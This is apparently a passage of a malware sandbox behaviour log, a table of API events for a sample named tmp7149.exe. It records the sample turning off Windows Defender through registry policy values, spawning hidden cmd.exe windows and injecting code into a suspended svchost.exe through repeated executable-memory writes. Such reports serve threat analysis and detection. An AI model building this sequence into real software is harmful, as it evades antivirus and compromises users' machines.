| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x764b779b |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x76b00000 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77e20000 |
|
1 | |
| Module | Load | module_name = shlwapi.dll, base_address = 0x75c60000 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75cf0000 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe, base_address = 0x400000 |
|
249 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Get Info | service_name = WinDefend |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x528, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x600, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x558, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
|
1 | |
| Registry | Write Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications |
|
1 | |
| Registry | Write Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications, value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\svchost.exe, os_pid = 0x980, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOW |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0xc0000018 |
|
1 | |
| Module | Load | module_name = kernelbase.dll, base_address = 0x0 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e168, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x50000, size = 544 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e168, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x7fffffdf000, size = 712 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0xffc20000, size = 64 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0xffc200e8, size = 264 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0xffc2246c, protection = PAGE_EXECUTE_READWRITE, size = 2679144 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xffc2246c, size = 22 |
|
1 | |
| Thread | Resume | process_name = c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe, os_tid = 0x24c |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e028, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2679064 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e0b0, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2678984 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140000000, size = 1024 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0x140000000, protection = PAGE_READONLY, size = 2678968 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140001000, size = 166400 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a000, size = 35328 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140033000, size = 3488 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140033000, size = 1024 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140034000, size = 8704 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140037000, size = 2048 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e050, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 2679120 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x140038000, size = 1536 |
|
2 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e008, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678168 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc18, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2677704 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc78, free_type = MEM_RELEASE, size = 2677864 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dda8, free_type = MEM_RELEASE, size = 2678176 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a2f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a300, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a308, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a310, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a318, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 11 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001b, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a320, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a328, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a330, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a338, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a340, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 9 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20019, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a348, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a350, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
